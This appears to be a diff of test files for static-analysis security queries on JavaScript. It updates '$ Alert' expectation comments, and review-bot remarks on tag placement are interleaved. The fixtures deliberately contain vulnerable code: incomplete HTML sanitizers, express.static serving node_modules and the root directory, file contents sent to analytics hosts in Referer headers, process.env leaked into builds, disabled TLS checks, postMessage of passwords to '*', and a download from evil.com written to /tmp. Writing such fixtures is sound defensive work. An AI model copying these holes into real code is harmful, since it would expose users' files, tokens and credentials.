s().replace(/</g, '').replace(/&/g, '').replace(/>/g, '');
|
||||
s().replace(/&/g, '').replace(/>/g, '').replace(/</g, '');
|
||||
|
||||
var s = s().replace(/</g, '');
|
||||
s = s.replace(/>/g, ''); // $ Alert
|
||||
s = s.replace(/>/g, '');
|
||||
s().replace(/</g, '<').replace(/>/g, '>').replace(/&/g, '&').replace(/"/g, '"');
|
||||
s().replace(/</g, '<').replace(/>/g, '>').replace(/&/g, '&').replace(/'/g, '''); // OK - single quotes or double quotes both work
|
||||
|
||||
@@ -306,7 +306,7 @@ function incompleteHtmlAttributeSanitization2() {
|
||||
}
|
||||
|
||||
function incompleteComplexSanitizers() {
|
||||
'=\'' + s().replace(/[&<>"]/gm, function (str) { // $ Alert
|
||||
'=\'' + s().replace(/[&<>"]/gm, function (str) {
|
||||
if (str === "&")
|
||||
return "&";
|
||||
if (str === "<")
|
||||
@@ -315,7 +315,7 @@ function incompleteComplexSanitizers() {
|
||||
return ">";
|
||||
if (str === "\"")
|
||||
return """;
|
||||
}) + '\'';
|
||||
}) + '\''; // $ Alert[js/incomplete-html-attribute-sanitization]
|
||||
|
||||
'="' + s().replace(/[&<>"]/gm, function (str) {
|
||||
if (str === "&")
|
||||
@@ -330,27 +330,27 @@ function incompleteComplexSanitizers() {
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(new RegExp("[<>]", "g"),''); // $ Alert
|
||||
s().replace(new RegExp("[<>]", "g"),'');
|
||||
}
|
||||
|
||||
function typicalBadHtmlSanitizers(s) {
|
||||
s().replace(new RegExp("[<>]", unknown()),''); // $ Alert
|
||||
s().replace(new RegExp("[<>]", unknown()),'');
|
||||
}
|
||||
|
||||
function bad18NewRegExp(p) {
|
||||
return p.replace(new RegExp("\\.\\./"), ""); // $ Alert
|
||||
return p.replace(new RegExp("\\.\\./"), "");
|
||||
}
|
||||
|
||||
function bad4NewRegExpG(s) {
|
||||
return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'","g"), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4NewRegExp(s) {
|
||||
return s.replace(new RegExp("\'"), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'"), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function bad4NewRegExpUnknown(s) {
|
||||
return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert
|
||||
return s.replace(new RegExp("\'", unknownFlags()), "\\$&"); // $ Alert[js/incomplete-sanitization]
|
||||
}
|
||||
|
||||
function newlinesNewReGexp(s) {
|
||||
@@ -359,8 +359,8 @@ function newlinesNewReGexp(s) {
|
||||
x.replace(new RegExp("\n", "g"), "").replace(x, y);
|
||||
x.replace(x, y).replace(new RegExp("\n", "g"), "");
|
||||
|
||||
x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert
|
||||
x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert
|
||||
x.replace(new RegExp("\n"), "").replace(x, y); // $ Alert[js/incomplete-sanitization]
|
||||
x.replace(x, y).replace(new RegExp("\n"), ""); // $ Alert[js/incomplete-sanitization]
|
||||
|
||||
x.replace(new RegExp("\n", unknownFlags()), "").replace(x, y);
|
||||
x.replace(x, y).replace(new RegExp("\n", unknownFlags()), "");
|
||||
|
||||
@@ -88,7 +88,7 @@ app.get('/baz3/a', (req, resp) => {
|
||||
resp.send({ test: 123 });
|
||||
});
|
||||
|
||||
app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2);
|
||||
app.use(/\/summonerByName|\/currentGame/,apiLimit1, apiLimit2); // $ Alert
|
||||
|
||||
app.get('/currentGame', function (req, res) {
|
||||
res.send("FOO");
|
||||
|
||||
@@ -7,4 +7,4 @@ https.get({
|
||||
path: "/upload",
|
||||
method: "GET",
|
||||
headers: { Referer: content }
|
||||
}, () => { });
|
||||
}, () => { }); // $ Alert[js/file-access-to-http]
|
||||
|
||||
@@ -4,8 +4,8 @@ var path = require("path");
|
||||
|
||||
var app = express();
|
||||
|
||||
app.use('basedir', express.static(__dirname)); // $ Alert
|
||||
app.use('basedir', express.static(__dirname)); // $ Alert[js/exposure-of-private-files]
|
||||
const rootDir = __dirname;
|
||||
app.use('basedir', express.static(rootDir)); // $ Alert
|
||||
app.use('basedir', express.static(rootDir)); // $ Alert[js/exposure-of-private-files]
|
||||
|
||||
app.use('/monthly', express.static(__dirname + '/')); // $ Alert
|
||||
app.use('/monthly', express.static(__dirname + '/')); // $ Alert[js/exposure-of-private-files]
|
||||
@@ -5,21 +5,21 @@ var path = require("path");
|
||||
var app = express();
|
||||
|
||||
// Not good.
|
||||
app.use(express.static('./node_modules/angular'));
|
||||
app.use('/angular', express.static('node_modules/angular'));
|
||||
app.use('/animate', express.static('node_modules/angular-animate'));
|
||||
app.use('/js', express.static(__dirname + '/node_modules/angular'));
|
||||
app.use('/router', express.static(__dirname + '/node_modules/angular-route/'));
|
||||
app.use(express.static('/node_modules/angular'));
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));
|
||||
app.use('/js',express.static('./'));
|
||||
app.use('/angular', express.static("./node_modules" + '/angular/'));
|
||||
app.use('/angular', express.static(path.join("./node_modules" + '/angular/')));
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules")));
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/'));
|
||||
app.use(express.static('./node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static('node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/animate', express.static('node_modules/angular-animate')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/js', express.static(__dirname + '/node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/router', express.static(__dirname + '/node_modules/angular-route/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use(express.static('/node_modules/angular')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/js',express.static('./')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static("./node_modules" + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join("./node_modules" + '/angular/'))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules"))); // $ Alert[js/exposure-of-private-files]
|
||||
app.use('/angular', express.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
|
||||
const rootDir = __dirname;
const nodeDir = path.join(rootDir + "/node_modules");
app.use('/angular', express.static(nodeDir + '/angular/'));
app.use('/angular', express.static(nodeDir + '/angular/')); // $ Alert[js/exposure-of-private-files]
@@ -37,10 +37,10 @@ app.use('basedir', express.static(__dirname)); // OK - because there is no packa
app.use('/monthly', express.static(__dirname + '/')); // OK - because there is no package.json in the same folder.
const connect = require("connect");
app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert
app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert
app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert
app.use('/root', require('serve-static')("/")); // $ Alert
app.use('/angular', connect.static(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
app.use('/angular', require('serve-static')(path.join(__dirname, "/node_modules") + '/angular/')); // $ Alert[js/exposure-of-private-files]
app.use('/home', require('serve-static')(require("os").homedir())); // $ Alert[js/exposure-of-private-files]
app.use('/root', require('serve-static')("/")); // $ Alert[js/exposure-of-private-files]
// Bad documentation example
function bad() {
@@ -48,7 +48,7 @@ function bad() {
var app = express();
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert
app.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules'))); // $ Alert[js/exposure-of-private-files]
}
// Good documentation example
@@ -67,7 +67,7 @@ const serveHandler = require("serve-handler");
const http = require("http");
http.createServer((request, response) => {
serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert
serveHandler(request, response, {public: "./node_modules/angular"}); // $ Alert[js/exposure-of-private-files]
serveHandler(request, response);
}).listen(8080);
@@ -22,7 +22,7 @@ try {
res.setEncoding('utf8');
});
post_req.write(s); // $ Alert - post the data from file to request body
post_req.write(s); // $ Alert[js/file-access-to-http] - post the data from file to request body
post_req.end();
} catch (e) {
}
@@ -26,7 +26,7 @@ fs.exists(fileName, function (exists) {
res.setEncoding('utf8');
});
req.write(chunk); // $ Alert - write data from file to request body
req.write(chunk); // $ Alert[js/file-access-to-http] - write data from file to request body
req.end();
});
@@ -19,8 +19,8 @@ function PostXML(xmlData)
headers: {
"content-type": "application/xml",
},
body: xmlData // $ Alert - passing data from file to the request body
}, function (error, response, body){
body: xmlData // passing data from file to the request body
}, function (error, response, body){ // $ Alert[js/file-access-to-http]
console.log(response);
});
}
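Review bot: The `$ Alert[js/file-access-to-http]` expectation now sits on `}, function (error, response, body){`, two lines away from the `body: xmlData` sink that the surviving comment describes, and that line carries no security meaning of its own, so a reader of the test can easily take the callback for the flagged element. The same separation appears in the histats hunk (`}, () => { }) // $ Alert[js/file-access-to-http]`), the DefinePlugin hunk (`}); // $ Alert[js/build-artifact-leak]`), the `app.get('/:path', ...)` hunk and the `_.merge` hunk (both `}); // $ Alert`). The placement looks like it follows the last line of the multi-line call the query reports, which is presumably what the inline-expectation matching keys on; saying so next to the tag keeps the test self-explanatory, e.g. `}, function (error, response, body){ // $ Alert[js/file-access-to-http] - reported on the whole request call; the sink is the xmlData body above`. PostXML's body starts outside this hunk.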
@@ -15,14 +15,14 @@ try {
hostname: "sstatic1.histats.com",
path: "/0.gif?4103075&101",
method: "GET",
headers: { Referer: "http://1.a/" + content } // $ Alert - passing stolen token in a header
}, () => { })
headers: { Referer: "http://1.a/" + content } // passing stolen token in a header
}, () => { }) // $ Alert[js/file-access-to-http]
https1.get({
hostname: "c.statcounter.com",
path: "/11760461/0/7b5b9d71/1/",
method: "GET",
headers: { Referer: "http://2.b/" + content } // $ Alert - passing stolen token in a header
}, () => { })
headers: { Referer: "http://2.b/" + content } // passing stolen token in a header
}, () => { }) // $ Alert[js/file-access-to-http]
});
});
}
@@ -3,4 +3,4 @@ var http = require('http')
var app = express()
var server = http.createServer(app)
// Static files:
app.use(express.static(__dirname))
app.use(express.static(__dirname)) // $ Alert[js/exposure-of-private-files]
@@ -1 +1 @@
window.parent.postMessage(userName, '*');
window.parent.postMessage(userName, '*'); // $ Alert
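Review bot: The new expectation `window.parent.postMessage(userName, '*'); // $ Alert` uses the bare `Alert` tag, while the express.static, serve-static and file-access hunks in this same commit were moved to the qualified form `$ Alert[js/<query-id>]`; the bare form is also what is added in the `authKey` postMessage hunk, the `rejectUnauthorized: false` hunk, the `res.end(action(...))` hunk, both `sendFile` route hunks, the `writeFileSync` hunk, `mergeSelective` and `_.merge`. If each of those test directories runs a single query the bare tag is presumably sufficient, but naming the query, e.g. `window.parent.postMessage(userName, '*'); // $ Alert[js/<query-id>]` with the directory's actual query id, keeps the expectations greppable and robust to a second query being added to the directory later. The .qlref files are not part of this diff, so this is a consistency question rather than a defect.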
@@ -10,4 +10,4 @@ window.parent.postMessage(password, '*'); // $ Alert
window.parent.postMessage(data.bar, '*');
})();
window.parent.postMessage(authKey, '*');
window.parent.postMessage(authKey, '*'); // $ Alert
@@ -5,7 +5,7 @@ let requestOptions = {
"content-type": "application/json",
"accept": "application/json"
},
rejectUnauthorized: false,
rejectUnauthorized: false, // $ Alert
requestCert: true,
agent: false
}
@@ -1,9 +1,9 @@
const webpack = require("webpack");
var plugin = new webpack.DefinePlugin({ // $ Alert
var plugin = new webpack.DefinePlugin({
"process.env": JSON.stringify(process.env)
});
}); // $ Alert[js/build-artifact-leak]
new webpack.DefinePlugin({ 'process.env': JSON.stringify({ DEBUG: process.env.DEBUG }) })
@@ -12,5 +12,5 @@ var actions = {
app.get('/perform/:action/:payload', function(req, res) {
let action = actions[req.params.action];
res.end(action(req.params.payload));
res.end(action(req.params.payload)); // $ Alert
});
@@ -5,7 +5,7 @@ app.get('/:path', function(req, res) {
let path = req.params.path;
if (isValidPath(path))
res.sendFile(path);
});
}); // $ Alert
function f1(req, res) {
let path = req.params.path;
@@ -22,4 +22,4 @@ function f3(req, res) {
res.sendFile(path);
}
app.get('/:path', f1, f2, f3);
app.get('/:path', f1, f2, f3); // $ Alert
@@ -3,6 +3,6 @@ var fs = require("fs");
https.get('https://evil.com/script', res => {
res.on("data", d => {
fs.writeFileSync("/tmp/script", d)
fs.writeFileSync("/tmp/script", d) // $ Alert
});
});
@@ -335,7 +335,7 @@ function mergeSelective(dst, src) {
if (dst[key]) {
mergeSelective(dst[key], src[key]);
} else {
dst[key] = src[key];
dst[key] = src[key]; // $ Alert
}
}
}
@@ -8,13 +8,13 @@ app.get('/hello', function(req, res) {
_.merge({}, req.query); // $ MISSING: Alert
_.merge({}, {
value: req.query.value // $ Alert
});
value: req.query.value
}); // $ Alert
let opts = {
thing: req.query.value // wrapped and unwrapped value
};
_.merge({}, {
value: opts.thing // $ Alert
});
value: opts.thing
}); // $ Alert
});